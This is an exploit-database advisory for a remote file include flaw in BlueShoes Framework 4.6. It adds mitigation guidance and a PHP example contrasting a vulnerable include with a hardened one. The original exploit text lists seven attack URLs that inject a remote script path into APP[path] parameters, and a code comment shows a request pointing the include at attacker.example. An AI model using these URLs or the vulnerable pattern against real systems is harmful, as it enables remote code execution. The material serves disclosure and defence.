Vendor: BlueShoes Framework
By: Kacper (a.k.a Rahim)
CVSS: 7.5 (HIGH)
CWE: 98 (Remote File Include)
Product Name: BlueShoes Framework
Affected Version From: 4.6
Affected Version To: 4.6
Patch Exists: NO
Related CWE: N/A
CPE: a:blueshoes:blueshoes_framework
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Date: 2006

BlueShoes Framework 4.6 <= Remote File Include Vulnerability

BlueShoes Framework 4.6 is vulnerable to remote file inclusion. An attacker can supply, through a crafted URL, the location of a remote file containing arbitrary code, which the vulnerable server then includes and executes. The vulnerable parameters are APP[path][applications], APP[path][core], GLOBALS[APP][path][core], and APP[path][plugins].

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before it is used in any file include operation.
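The following PHP is an added illustration and is not BlueShoes code. It assumes the affected scripts build include paths from a configuration array ($APP) that request data can overwrite (the register_globals behaviour of PHP 4, which the APP[path][...] parameters above point to), and it shows one hardened replacement in which the include root is fixed by the deployment layout and every include path is resolved and confined to that root. The directory and file names (BS_CORE_PATH, SomeCoreClass.class.php) are placeholders; the function syntax requires PHP 7.1 or later.

```php
<?php
// Added illustration, not BlueShoes code: how an include rooted in an
// overwritable configuration array becomes a remote file include, and one
// hardened replacement. Directory and file names below are assumed.

// --- Vulnerable pattern (assumed shape of the affected scripts) ---
// With register_globals on (the PHP 4 default), a request carrying
//   ?APP[path][core]=http://attacker.example/
// populates $APP['path']['core'] before the script's own code runs, so the
// include below fetches and executes remote code whenever the interpreter
// allows URL includes.
function vulnerableInclude(array $APP): void
{
    require_once $APP['path']['core'] . 'SomeCoreClass.class.php'; // hypothetical file
}

// --- Hardened pattern ---
// 1. The include root comes from the code's own deployment layout, never
//    from request data or from a global that request data can populate.
define('BS_CORE_PATH', __DIR__ . '/../core/'); // assumed layout

// 2. Every include path is resolved and checked against that root.
function safeInclude(string $base, string $file): string
{
    $candidate = $base . $file;
    // No stream wrappers (http://, ftp://, php://, data:, ...): local files only.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $candidate) || stripos($candidate, 'data:') === 0) {
        throw new RuntimeException('Stream wrapper in include path rejected');
    }
    // Only a bare file name may be appended: no directory separators.
    if ($file !== basename($file)) {
        throw new RuntimeException('Include file name must not contain a path');
    }
    $root   = realpath($base);
    $target = realpath($candidate);
    // realpath() returns false for paths that do not exist (and for URLs) and
    // collapses "../", so a prefix check confines the include to the root.
    if ($root === false || $target === false
        || strncmp($target, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new RuntimeException('Include outside allowed directory rejected');
    }
    require_once $target;
    return $target;
}

// 3. Defence in depth at the interpreter level (php.ini), so a later coding
//    mistake cannot reintroduce remote includes:
//      allow_url_include = Off
//      register_globals  = Off   (the directive was removed in PHP 5.4)

safeInclude(BS_CORE_PATH, 'SomeCoreClass.class.php');
```

The wrapper check is the readable guard; the realpath() prefix comparison is the backstop, because it fails closed for URLs, non-existent files and "../" sequences alike. Returning the resolved path lets a log line record exactly which file was loaded, which is what you want when investigating a suspected inclusion attempt.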
Source

Exploit-DB raw data:

$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$  BlueShoes Framework 4.6 <= Remote File Include Vulnerability
$$  Script site: http://www.blueshoes.org/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$              Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$           Adam, DeathSpeed, Drzewko, pepi
$$
$$  Special greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Expl:

http://www.site.com/[BlueShoes_path]/applications/faq/Bs_Faq.class.php?APP[path][applications]=[evil_scripts]

http://www.site.com/[BlueShoes_path]/applications/filebrowser/fileBrowserInner.php?APP[path][core]=[evil_scripts]

http://www.site.com/[BlueShoes_path]/applications/filemanager/file.php?APP[path][core]=[evil_scripts]

http://www.site.com/[BlueShoes_path]/applications/filemanager/viewer.php?APP[path][core]=[evil_scripts]

http://www.site.com/[BlueShoes_path]/applications/imagearchive/Bs_ImageArchive.class.php?APP[path][core]=[evil_scripts]

http://www.site.com/[BlueShoes_path]/applications/mailinglist/Bs_Ml_User.class.php?GLOBALS[APP][path][core]=[evil_scripts]

http://www.site.com/[BlueShoes_path]/applications/websearchengine/Bs_Wse_Profile.class.php?APP[path][plugins]=[evil_scripts]

# Greetings to everyone ;-)

# milw0rm.com [2006-06-03]